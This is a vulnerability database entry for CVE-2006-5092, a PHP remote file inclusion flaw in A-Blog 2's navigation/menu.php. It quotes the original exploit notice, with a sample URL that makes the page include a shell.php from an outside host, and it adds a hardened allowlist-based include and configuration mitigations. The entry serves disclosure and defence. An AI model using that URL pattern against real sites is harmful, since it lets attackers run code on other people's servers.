A-Blog 2 'navigation/menu.php' PHP Remote File Inclusion Vulnerability

Vulnerability ID: 1111145 | Vulnerability type: Input validation
Published: 2006-09-26 | Updated: 2006-10-09
CVE ID: CVE-2006-5092 | CNNVD ID: CNNVD-200609-547
Platform: PHP | CVSS score: 7.5
|Sources
https://www.exploit-db.com/exploits/2436
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200609-547
|Vulnerability details
A-Blog 2 contains a PHP remote file inclusion vulnerability in navigation/menu.php. A remote attacker can execute arbitrary PHP code by supplying a URL in the navigation_start parameter.
|Exploit
###### ToXiC #########################
#
#A-Blog Remote File Include
#
#BuG FounD by Drago84
#
#Application Affect:A-Blog
#Source Code:
#http://prdownloads.sourceforge.net/a-blog/A-BlogV2.rar?download
#Problem:
#<?php include ("$navigation_start"); ?>
#<?php include("$navigation_middle"); ?>
#Solution:
#Include in page require ("mainfile.php");
#Page Vulnerable : menu.php
#Dir : /navigation/
# Example Of ExPloit is:
#http://www.site.com/ablog_dir/navigation/menu.php?navigation_start=http://marcusbestlamer.gay/shell.php?

#GrEatZ All Member of ToXiC, Str0ke
# Fuck Sonic,a|x
# ToXic Security Italian CreW

###### ToXiC ###################

# milw0rm.com [2006-09-26]
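The two lines quoted in the advisory, include("$navigation_start") and include("$navigation_middle"), pass a request-controlled variable straight to include(), which is what lets a remote URL be pulled in. The block below is an added example written for this page, not A-Blog's own code: it shows the hardened form of that include, where the request supplies only a short key that is resolved against a fixed map of local files, so URLs, stream wrappers and path traversal never reach include(). The fragment file names and the parameter handling are assumptions for illustration.

```php
<?php
// Added example (not A-Blog's code). The advisory's vulnerable pattern is
//     <?php include("$navigation_start"); ?>
// where $navigation_start is filled directly from the request (register_globals)
// and can therefore name a remote URL when allow_url_include/allow_url_fopen is on.
//
// Hardened equivalent: never feed request data to include(); map a caller-supplied
// key to one of a few known local files. The file names below are assumed.

const NAVIGATION_FRAGMENTS = [
    'default' => 'navigation/start_default.php',
    'compact' => 'navigation/start_compact.php',
];

/**
 * Resolve a request-supplied key to a local include path, or return null if the
 * key is not on the allowlist. Anything that is not an exact key (a URL, a
 * php:// or data:// wrapper, a ../ sequence) is rejected before include() runs.
 */
function resolve_navigation_fragment(?string $key, string $base_dir): ?string
{
    if ($key === null || $key === '') {
        $key = 'default';
    }
    if (!array_key_exists($key, NAVIGATION_FRAGMENTS)) {
        return null;
    }
    $path = $base_dir . DIRECTORY_SEPARATOR . NAVIGATION_FRAGMENTS[$key];

    // Defence in depth: the resolved file must exist and must stay under $base_dir.
    $real      = realpath($path);
    $real_base = realpath($base_dir);
    if ($real === false || $real_base === false) {
        return null;
    }
    $prefix = $real_base . DIRECTORY_SEPARATOR;
    if (strncmp($real, $prefix, strlen($prefix)) !== 0) {
        return null;
    }
    return $real;
}

// Read the parameter explicitly instead of relying on register_globals.
$requested = filter_input(INPUT_GET, 'navigation_start', FILTER_DEFAULT);
$fragment  = resolve_navigation_fragment($requested, __DIR__);

if ($fragment === null) {
    // Unknown or malformed key: refuse rather than fall through to a raw include.
    http_response_code(400);
    exit('Unknown navigation fragment');
}
include $fragment;
```

The allowlist is the actual fix; the realpath() prefix check only guards against a mistake in the map itself. As a separate, configuration-level mitigation, allow_url_include (PHP 5.2 and later) and register_globals should both be off in php.ini, so that even an unpatched include cannot fetch remote code or be fed from the query string.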
|References

Source: XF
Name: ablog-menu-file-include(29164)
Link: http://xforce.iss.net/xforce/xfdb/29164
Source: BID
Name: 20230
Link: http://www.securityfocus.com/bid/20230
Source: VUPEN
Name: ADV-2006-3796
Link: http://www.frsirt.com/english/advisories/2006/3796
Source: SECUNIA
Name: 22061
Link: http://secunia.com/advisories/22061
Source: MILW0RM
Name: 2436
Link: http://milw0rm.com/exploits/2436
Source: OSVDB
Name: 29217
Link: http://www.osvdb.org/29217